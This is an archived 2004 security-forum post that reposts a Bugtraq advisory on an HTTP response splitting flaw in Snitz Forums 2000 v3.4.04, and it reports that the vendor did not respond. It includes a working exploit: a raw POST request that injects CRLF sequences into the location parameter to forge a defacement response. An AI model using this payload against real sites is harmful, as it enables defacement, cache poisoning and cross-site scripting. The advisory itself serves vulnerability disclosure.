Help
-
Search
-
Member List
-
Calendar
Full Version:
Http Response Splitting In Snitz Forums 2000
GovernmentSecurity.org
>
The Archives
>
Exploit Articles
qcred11
Sep 17 2004, 04:52 AM
QUOTE
ADVISORY
Author: Maestro
Date: 16-SEP-04
Vendor: Snitz Communications (www.snitz.com)
Product: Snitz Forums 2000 v3.4.04
Product description: (from vendor website) "the leading ASP forum/bbs on the internet today"
Problem: Http response splitting (web cache poisoning, xss,
yadayadayada) -
http://www.packetstormsecurity.org/papers/...ttpresponse.pdf
Exploit:
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}
(replace curly braces with lessthan and greaterthan)
Vendor status: vendor contacted several times (email to support@ and to the contact email in the code). No response from vendor.
Source:
http://seclists.org/lists/bugtraq/2004/Sep/0203.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here
.
Invision Power Board © 2001-2005
Invision Power Services, Inc.
